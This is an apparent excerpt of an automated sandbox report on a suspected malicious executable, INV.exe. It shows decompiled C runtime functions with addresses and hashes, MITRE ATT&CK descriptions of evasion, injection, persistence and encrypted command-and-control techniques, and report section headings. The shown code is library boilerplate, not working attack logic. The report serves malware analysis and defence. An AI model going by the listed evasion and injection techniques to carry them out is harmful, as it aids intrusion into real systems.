				void* _t31;
				void* _t32;
				long _t36;
				long _t37;
				void* _t40;

				_t29 = __edx;
				_t23 = __ecx;
				_t20 = __ebx;
				_t36 = GetLastError();
				_t2 =  *0x412064; // 0x7
				_t42 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L2:
					_t3 = E00403ECE(_t23, 1, 0x364);
					_t31 = _t3;
					_pop(_t25);
					if(_t31 != 0) {
						_t4 = E004058CE(_t25, __eflags,  *0x412064, _t31);
						__eflags = _t4;
						if(_t4 != 0) {
							E00404192(_t25, _t31, 0x4132a4);
							E00403E03(0);
							_t40 = _t40 + 0xc;
							__eflags = _t31;
							if(_t31 == 0) {
								goto L9;
							} else {
								goto L8;
							}
						} else {
							_push(_t31);
							goto L4;
						}
					} else {
						_push(_t3);
						L4:
						E00403E03();
						_pop(_t25);
						L9:
						SetLastError(_t36);
						E00403E8B(_t20, _t29, _t31, _t36);
						asm("int3");
						_push(_t20);
						_push(_t36);
						_push(_t31);
						_t37 = GetLastError();
						_t21 = 0;
						_t9 =  *0x412064; // 0x7
						_t45 = _t9 - 0xffffffff;
						if(_t9 == 0xffffffff) {
							L12:
							_t32 = E00403ECE(_t25, 1, 0x364);
							_pop(_t27);
							if(_t32 != 0) {
								_t11 = E004058CE(_t27, __eflags,  *0x412064, _t32);
								__eflags = _t11;
								if(_t11 != 0) {
									E00404192(_t27, _t32, 0x4132a4);
									E00403E03(_t21);
									__eflags = _t32;
									if(_t32 != 0) {
										goto L19;
									} else {
										goto L18;
									}
								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}

0x00404320
0x00404320
0x00404320
0x0040432a
0x0040432c
0x00404331
0x00404334
0x00404342
0x00404349
0x0040434e
0x00404351
0x00404354
0x00404366
0x0040436b
0x0040436d
0x00404378
0x0040437f
0x00404384
0x00404387
0x00404389
0x00000000
0x00000000
0x00000000
0x00000000
0x0040436f
0x0040436f
0x00000000
0x0040436f
0x00404356
0x00404356
0x00404357
0x00404357
0x0040435c
0x00404397
0x00404398
0x0040439e
0x004043a3
0x004043a6
0x004043a7
0x004043a8
0x004043af
0x004043b1
0x004043b3
0x004043b8
0x004043bb
0x004043c9
0x004043d5
0x004043d8
0x004043db
0x004043ed
0x004043f2
0x004043f4
0x004043ff
0x00404405
0x0040440d
0x0040440f
0x00000000
0x00000000
0x00000000
0x00000000
0x004043f6
0x004043f6
0x00000000
0x004043f6
0x004043dd
0x004043dd
0x004043de
0x004043de
0x00404411
0x00404412
0x00404412
0x004043bd
0x004043c3
0x004043c7
0x0040441a
0x0040441b
0x00404421
0x00000000
0x00000000
0x00000000
0x004043c7
0x00404428
0x00404428
0x00404336
0x0040433c
0x00404340
0x0040438b
0x0040438c
0x00404396
0x00000000
0x00000000
0x00000000
0x00404340

APIs

GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
_abort.LIBCMT ref: 0040439E

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ErrorLast$_abort
String ID:
API String ID: 88804580-0
Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D

Uniqueness

Uniqueness Score: -1.00%

Function 000A2F81, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E000A2F81(void* __edx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E000A34F0(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E000A3025(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E000A37A4(__edx, __esi, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E000A36C5(__edx, __esi, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

APIs

__cftof_l.LIBCMT ref: 000A2FA5

Part of subcall function 000A36C5: __fltout2.LIBCMT ref: 000A36EE

__cftog_l.LIBCMT ref: 000A2FCB
__cftoe_l.LIBCMT ref: 000A2FFD

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction ID: 6b66d0d94d8bd47282ee870131df05e36bfc81e154958616fb2ecbfa8cdeb90a
Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
Instruction Fuzzy Hash: 38014B7200014ABFCF665EC8DC02CEE3F76BF1A354B598425FA1858132D236CAB1AB81

Uniqueness

Uniqueness Score: -1.00%

Function 000987A1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E000987A1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t24;
				void* _t28;
				intOrPtr* _t40;
				void* _t41;

				_push(0xc);
				_push(0xacf38);
				E000927F0(__ebx, __edi, __esi);
				_t28 = E000915FE();
				_t40 = E000932EE(8, 1);
				 *((intOrPtr*)(_t41 - 0x1c)) = _t40;
				_t43 = _t40;
				if(_t40 != 0) {
					E000936DB(_t28, __edx, 1, _t40, __eflags);
					E00093AF6(_t28, __edx, 1, _t40, __eflags);
					 *_t40 =  *((intOrPtr*)(_t28 + 0x6c));
					 *((intOrPtr*)(_t40 + 4)) =  *((intOrPtr*)(_t28 + 0x68));
					E00093117(0xc);
					 *(_t41 - 4) =  *(_t41 - 4) & 0x00000000;
					E0009344C( *_t40);
					 *(_t41 - 4) = 0xfffffffe;
					E00098E70();
					E00093117(0xd);
					 *(_t41 - 4) = 1;
					asm("lock xadd [eax], edi");
					__eflags = 2;
					 *(_t41 - 4) = 0xfffffffe;
					E00098E7C();
					_t24 = _t40;
				} else {
					 *((intOrPtr*)(E00094196(_t43))) = 0xc;
					_t24 = 0;
				}
				return E00092835(_t24);
			}

APIs

Part of subcall function 000915FE: __getptd_noexit.LIBCMT ref: 000915FF
Part of subcall function 000915FE: __amsg_exit.LIBCMT ref: 0009160C

__calloc_crt.LIBCMT ref: 00098DEF

Part of subcall function 000932EE: __calloc_impl.LIBCMT ref: 000932FD

__lock.LIBCMT ref: 00098E25
___addlocaleref.LIBCMT ref: 00098E31
__lock.LIBCMT ref: 00098E45

Part of subcall function 00094196: __getptd_noexit.LIBCMT ref: 00094196

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: __getptd_noexit__lock$___addlocaleref__amsg_exit__calloc_crt__calloc_impl
String ID:
API String ID: 2580527540-0
Opcode ID: b07550699f19c94048a2a0307fdf15cae7b141b914546c78f4d53abc3e5d77be
Instruction ID: d65d612fa01061dc693ace4b5ae9497124216b101f9e1fde085a9191db80e57c
Opcode Fuzzy Hash: b07550699f19c94048a2a0307fdf15cae7b141b914546c78f4d53abc3e5d77be
Instruction Fuzzy Hash: C0014031605301ABDF20BFB89903B9E77E0AF85720F118149F4559B3D3DE745E41AB65

Uniqueness

Uniqueness Score: -1.00%

Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}

0x004025ba
0x004025bf
0x004025cb
0x004025d0
0x004025d5
0x004025d7
0x004025e2
0x004025d9
0x004025d9
0x00000000
0x004025d9
0x004025cd
0x004025cd
0x004025cf
0x004025cf

APIs

___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4

Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA

___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9

Memory Dump Source

Source File: 00000002.00000002.666412273.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
String ID:
API String ID: 1761009282-0
Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E

Uniqueness

Uniqueness Score: -1.00%

Function 00094FE5, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00094FE5() {
				intOrPtr _t3;
				intOrPtr _t4;
				void* _t6;
				intOrPtr _t9;
				void* _t12;
				intOrPtr _t13;

				_t3 =  *0xf1a84;
				_t13 = 0x14;
				if(_t3 != 0) {
					if(_t3 < _t13) {
						_t3 = _t13;
						goto L4;
					}
				} else {
					_t3 = 0x200;
					L4:
					 *0xf1a84 = _t3;
				}
				_t4 = E000932EE(_t3, 4);
				 *0xf1a80 = _t4;
				if(_t4 != 0) {
					L8:
					_t12 = 0;
					_t9 = 0xaea60;
					while(1) {
						 *((intOrPtr*)(_t12 + _t4)) = _t9;
						_t9 = _t9 + 0x20;
						_t12 = _t12 + 4;
						if(_t9 >= 0xaece0) {
							break;
						}
						_t4 =  *0xf1a80;
					}
					return 0;
				} else {
					 *0xf1a84 = _t13;
					_t4 = E000932EE(_t13, 4);
					 *0xf1a80 = _t4;
					if(_t4 != 0) {
						goto L8;
					} else {
						_t6 = 0x1a;
						return _t6;
					}
				}
			}

0x00094fe5
0x00094fed
0x00094ff0
0x00094ffb
0x00094ffd
0x00000000
0x00094ffd
0x00094ff2
0x00094ff2
0x00094fff
0x00094fff
0x00094fff
0x00095007
0x0009500c
0x00095015
0x00095035
0x00095035
0x00095037
0x0009503c
0x0009503c
0x0009503f
0x00095042
0x0009504b
0x00000000
0x00000000
0x0009504d
0x0009504d
0x00095057
0x00095017
0x0009501a
0x00095020
0x00095025
0x0009502e
0x00000000
0x00095030
0x00095032
0x00095034
0x00095034
0x0009502e

APIs

__calloc_crt.LIBCMT ref: 00095007
__calloc_crt.LIBCMT ref: 00095020

Strings

`, xrefs: 00095037

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: __calloc_crt
String ID: `
API String ID: 3494438863-2930790904
Opcode ID: 1ebf335c88b0c1146ab46b0ae446c8a5d6e89c09a5e7be3a04354af98be6797e
Instruction ID: c381f03891ec4ee1cb5b7c3b16fe849011d87521d764edac47ae6b375a3b7666
Opcode Fuzzy Hash: 1ebf335c88b0c1146ab46b0ae446c8a5d6e89c09a5e7be3a04354af98be6797e
Instruction Fuzzy Hash: C1F0AF71209602CAFF348B6AFC51BF52794F761770B100026F201CE9D5E7398841F785

Uniqueness

Uniqueness Score: -1.00%

Function 000986D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E000986D1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t4;
				void* _t15;
				void* _t17;

				_push(8);
				_push(0xacfc0);
				_t4 = E000927F0(__ebx, __edi, __esi);
				_t17 =  *0xae2e4 - 0xae2e8; // 0xae2e8
				if(_t17 != 0) {
					E00093117(0xc);
					 *(_t15 - 4) =  *(_t15 - 4) & 0x00000000;
					 *0xae2e4 = E0009375B("��", 0xae2e8);
					 *(_t15 - 4) = 0xfffffffe;
					_t4 = E0009871A();
				}
				return E00092835(_t4);
			}

0x000986d1
0x000986d3
0x000986d8
0x000986e2
0x000986e8
0x000986ec
0x000986f2
0x00098703
0x00098708
0x0009870f
0x0009870f
0x00098719

APIs

__lock.LIBCMT ref: 000986EC

Part of subcall function 00093117: __mtinitlocknum.LIBCMT ref: 00093129
Part of subcall function 00093117: __amsg_exit.LIBCMT ref: 00093135
Part of subcall function 00093117: EnterCriticalSection.KERNEL32(00000000,?,000916CE,0000000D), ref: 00093142

__updatetlocinfoEx_nolock.LIBCMT ref: 000986FC

Part of subcall function 0009375B: ___addlocaleref.LIBCMT ref: 00093777
Part of subcall function 0009375B: ___removelocaleref.LIBCMT ref: 00093782
Part of subcall function 0009375B: ___freetlocinfo.LIBCMT ref: 00093796

Strings

, xrefs: 000986E2, 000986F7, 00098703

Memory Dump Source

Source File: 00000002.00000002.666197899.0000000000091000.00000020.00020000.sdmp, Offset: 00090000, based on PE: true

Associated: 00000002.00000002.666178246.0000000000090000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666272435.00000000000A8000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.666298261.00000000000AE000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.666388011.00000000000F2000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__amsg_exit__lock__mtinitlocknum__updatetlocinfo
String ID:
API String ID: 236788210-2599400749
Opcode ID: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
Instruction ID: 6fe879db6dbd93f9d9499297c198aab8f3acdae90320a32ca93300a83fd796fe
Opcode Fuzzy Hash: 56d8877799b0669b77fb8b5540cf9d49b1b70e3c8cfed34379f379e2a7dbfaaf
Instruction Fuzzy Hash: 6FE0CD3154E751EEFE14F7E0D907BCCAA545B03B21F204157F104651C3CE780600A75A

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report INV.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

UDP Packets

ICMP Packets

Code Manipulations

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Function 000A7800, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 113
memoryCOMMON

Function 00091DCF, Relevance: 12.2, APIs: 8, Instructions: 229
COMMON

Function 0009E84E, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 56
COMMON

Function 000930E7, Relevance: 3.0, APIs: 2, Instructions: 8
COMMON

Function 0009771D, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 000930B6, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 00091DB2, Relevance: 1.3, APIs: 1, Instructions: 7
memoryCOMMON

Function 0009B933, Relevance: .3, Instructions: 345
COMMONCrypto

Function 0009BD68, Relevance: .3, Instructions: 341
COMMONCrypto

Function 0009B4FE, Relevance: .3, Instructions: 331
COMMONCrypto

Function 0009B0E6, Relevance: .3, Instructions: 323
COMMONCrypto

Function 000A7A20, Relevance: .0, Instructions: 7
COMMON

Function 0009197C, Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 84
COMMON

Function 00098E85, Relevance: 19.6, APIs: 13, Instructions: 84
COMMON

Function 00098F5C, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 131
COMMON

Function 000917CB, Relevance: 15.1, APIs: 10, Instructions: 75
COMMON

Function 00091738, Relevance: 10.5, APIs: 7, Instructions: 45
threadCOMMON

Function 0009879C, Relevance: 9.0, APIs: 6, Instructions: 50
COMMON

Function 000959FE, Relevance: 7.6, APIs: 5, Instructions: 67
COMMON

Function 0009F3F6, Relevance: 6.1, APIs: 4, Instructions: 97
COMMON

Function 000987A1, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 000A2F81, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Function 000986D1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20
COMMON

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON